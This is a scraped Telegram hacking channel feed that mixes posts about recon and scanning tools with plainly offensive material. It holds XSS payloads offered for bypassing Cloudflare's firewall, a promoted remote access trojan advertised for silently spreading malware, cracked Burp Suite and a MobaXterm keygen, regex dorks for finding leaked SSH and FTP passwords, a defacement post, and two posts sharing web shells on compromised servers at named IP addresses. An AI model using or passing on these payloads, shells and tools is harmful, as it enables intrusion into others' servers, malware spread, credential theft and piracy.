BugCod3
7.26K subscribers
334 photos
6 videos
7 files
445 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
πŸ’™ Burpsuite Pro πŸ’™

πŸ“‚ README (en+ru) included, plz read it before run BS.

πŸ”Ό Run with Java 18 (JDK for Win included)

⬇️ Download
πŸ”’ 311138

#Burpsuite #Pro #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀74⚑1
Media is too big
VIEW IN TELEGRAM
πŸ‘» steghide πŸ‘»

πŸ’¬
Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven.

πŸ’‘
Steghide is designed to be portable and configurable and features hiding data in bmp, jpeg, wav and au files, blowfish encryption, MD5 hashing of passphrases to blowfish keys, and pseudo-random distribution of hidden bits in the container data.

πŸ•Έ Steghide is useful in digital forensics investigations.

πŸ”Ό Install:
πŸ‘©β€πŸ’» Kali:
sudo apt install steghide


⬇️ Download (windows)
πŸ”’ BugCod3

#Steghide #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀33⚑1
Media is too big
VIEW IN TELEGRAM
πŸ•· ExifTool πŸ•·

πŸ’¬
Image::ExifTool is a customizable set of Perl modules plus a full-featured command-line application called exiftool for reading and writing meta information in a wide variety of files, including the maker note information of many digital cameras by various manufacturers such as Canon, Casio, DJI, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

πŸ“Š
The following modules/packages are recommended for specific features, e.g. decoding compressed and/or encrypted information from the indicated file types, calculating digest values for some information types, etc.:

βšͺ️ Archive::Zip / libarchive-zip-perl: ZIP, DOCX, PPTX,
XLSX, ODP, ODS, ODT, EIP, iWork

βšͺ️ Unicode::LineBreak / libunicode-linebreak-perl: for column-alignment of alternate language output

βšͺ️ POSIX::strptime / libposix-strptime-perl: for inverse date/time conversion

βšͺ️ Time::Piece (in perl core): alternative to POSIX::strptime

βšͺ️ IO::Compress::RawDeflate + IO::Uncompress::RawInflate (in perl core): for reading FLIF images

βšͺ️ Compress::Raw::Lzma / libcompress-raw-lzma-perl: for reading encoded 7z files

βšͺ️ IO::Compress::Brotli + IO::Uncompress::Brotli / libio-compress-brotli-perl: for writing/reading compressed JXL metadata

πŸ”Ό Install:
πŸ‘©β€πŸ’» Kali:
sudo apt install libimage-exiftool-perl


⬇️ Download πŸ”ŸπŸ‘©β€πŸ’»πŸ‘©β€πŸ’»
πŸ”’ BugCod3

#Steghide #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3⚑1❀1
🦊 DalFox 🦊

πŸ’¬
DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

πŸ”Ό Install:
go install github.com/hahwul/dalfox/v2@latest


πŸ’» Usage:
dalfox [mode] [target] [flags]


πŸ‘€ Single target mode:
dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
-b https://your-callback-url


πŸ‘₯ Multiple target mode from file:
dalfox file urls_file --custom-payload ./mypayloads.txt


πŸͺŸ Pipeline mode:
cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"


😸 Github

⬇️ Donwload
πŸ”’ BugCod3

#Go #XSS #Scanner #Vulnerability #BugBounty
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3⚑1❀1πŸ‘1
Cloudflare bypass XSS payloads

Tested On: πŸ‘©β€πŸ’»

XSS Payloads:
for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert β€˜0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">


#Exploit #XSS #Payload
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘33⚑2❀2
New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>


#XSS #Payload #Bypass #CF #WAF
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4❀2⚑1🍾1
πŸ‘£ haktrails πŸ‘£

πŸ’¬
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.

πŸ“Š Tool Features:
βšͺ️ stdin input for easy tool chaining
βšͺ️ subdomain discovery
βšͺ️ associated root domain discovery
βšͺ️ associated IP discovery
βšͺ️ historical DNS data
βšͺ️ historical whois data
βšͺ️ DSL queries (currently a prototype)
βšͺ️ company discovery (discover the owner of a domain)
βšͺ️ whois (returns json whois data for a given domain)
βšͺ️ ping (check that your current SecurityTrails configuration/key is working)
βšͺ️ usage (check your current SecurityTrails usage)
βšͺ️ "json" or "list" output options for easy tool chaining
βšͺ️ "ZSH & Bash autocompletion"

πŸ”Ό Installation:
go install -v github.com/hakluke/haktrails@latest


πŸ’» Usage:

Gather subdomains
cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains

and...

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Go #Subdomain #IP #Discovery
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2⚑1❀1πŸ”₯1
Main sinks that can lead to DOM-XSS

#Javacript #Dom #XSS
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3⚑1❀1πŸ‘1
🦎 Subprober 🦎

πŸ”” Subprober v1.0.5 - Fast Probing Tool for Penetration Testing

πŸ‘β€πŸ—¨ Overview:
Subprober v1.0.5 is a powerful and efficient tool designed for penetration testers and security professionals. This release introduces several enhancements, bug fixes, and new features to elevate your subdomain probing experience. Subprober facilitates fast and reliable information extraction, making it an invaluable asset for penetration testing workflows.

πŸ“Š Features:
βšͺ️ Subprober Concurrency and Accuracy are Improved with libraries like aiohttp,asyncio
βšͺ️ Subprober Error handling and Synchronization are improved
βšͺ️ Resolved some Bugs for Subprober
βšͺ️ Subprober Commands are changed with usefull flags
βšͺ️ Resolved executive errors in v1.0.4
βšͺ️ Subprober requires python version 3.11.x

πŸ”Ό Installation:
Method 1:
pip install git+https://github.com/sanjai-AK47/Subprober.git

Method 2:
cd Subprober
pip install .


πŸ’» Basic Usage:
subprober -f subdomains.txt -o output.txt -tl -wc -sv  -apt -wc -ex 500 -v -o output.txt -c 20


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Subdomains #Scanner
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀22⚑1πŸ‘1
πŸ‘» Ghost πŸ‘»

πŸ‘» RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

πŸ’¬
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

πŸ‘β€πŸ—¨
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015



πŸ“Š Features:
βšͺ️ Remote command execution
βšͺ️ Silent background process
βšͺ️ Download and run file (Hidden)
βšͺ️ Safe Mode startup
βšͺ️ Will automatically connect to the server
βšͺ️ Data sent and received is encrypted (substitution cipher)
βšͺ️ Files are hidden
βšͺ️ Installed Antivirus shown to server
βšͺ️ Easily spread malware through download feature
βšͺ️ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
βšͺ️ Disable Task Manager

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Rat #Malware #Remote #Access
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘33⚑1❀1
πŸ•· hakip2host πŸ•·

πŸ’¬
hakip2host takes a list of IP addresses via stdin, then does a series of checks to return associated domain names.

πŸ“Š Current supported checks are:
βšͺ️ DNS PTR lookups
βšͺ️ Subject Alternative Names (SANs) on SSL certificates
βšͺ️ Common Names (CNs) on SSL certificates

πŸ”Ό Installation:
go install github.com/hakluke/hakip2host@latest


πŸ’» Usage:
hakip2host --help


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Osint #Recon #CIDR #HTTPS
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4⚑1❀1πŸ‘1
πŸ‘ Burpsuite Pro πŸ‘

πŸ“‚ README (en+ru) included, plz read it before run BS.

πŸ”Ό Run with Java 18 (JDK for Win included)

⬇️ Download
πŸ”’ 311138

#Burpsuite #Pro #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4⚑1❀1
🌐 Bypass login authentication 🌐

⬇️ Download
πŸ”’ BugCod3

#Bypass #Login #Page #Authentication
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
7❀‍πŸ”₯2⚑1❀1πŸ‘1
πŸ«₯ MobaXterm Keygen πŸ”˜

⚠️ Please see source code. It is not complex. ⚠️

I don't know how to make custom settings take effect in Customizer mode directly.

πŸ’¬
The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

πŸ“Š Postscript:
βšͺ️ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

βšͺ️ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

βšͺ️ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".
./MobaXterm.exe -customizer


πŸ’» Usage:
./MobaXterm-Keygen.py "DoubleSine" 10.9


😸 Github

⬇️ Donwload
πŸ”’ BugCod3

#Python #MobaXterm #Keygen #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6⚑1❀1
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
7⚑1❀1
πŸ”‘ LEAKEY πŸ”‘

LEAKEY is a bash script which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

πŸ’¬
LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The script is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.

LEAKEY uses a json based signature file located at ~/.leakey/signatures.json
The idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.

LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the signatures.json file

πŸ‘€ Requirements:
βšͺ️ jq

πŸ”Ό Installation:
curl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh


πŸ’» Usage:
After running the installation command, simply run the below in your terminal
leaky


πŸ“Š Adding Checks:
All the checks for LEAKEY are defined in the signatures.json file.
To add any new checks, simply appened the signatures file at ~/.leakey/signatures.json
{
"id": 0,
"name": "Slack API Token",
"args": [
"token"
],
"command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
}


😸 Github

⬇️ Download
πŸ”’ BugCod3

#RedTeam #BugHunter #Leaked #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘4❀22⚑1
πŸ•Έ Site
πŸ‘β€πŸ—¨ Mirror-h

Country: πŸ‡ΊπŸ‡Έ

#Deface
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4⚑1πŸ”₯1
PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [πŸ‡ΈπŸ‡¬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

πŸ”— Link
pwd: bugcod3

Enjoy... ⭐️

#Shell
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑1❀‍πŸ”₯1πŸ”₯1
Please open Telegram to view this post
VIEW IN TELEGRAM
❀‍πŸ”₯2⚑1πŸ”₯1
PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [πŸ‡ΊπŸ‡Έ]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

πŸ”— Link

Enjoy... ⭐️

#Shell
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑1❀‍πŸ”₯1πŸ”₯1😒1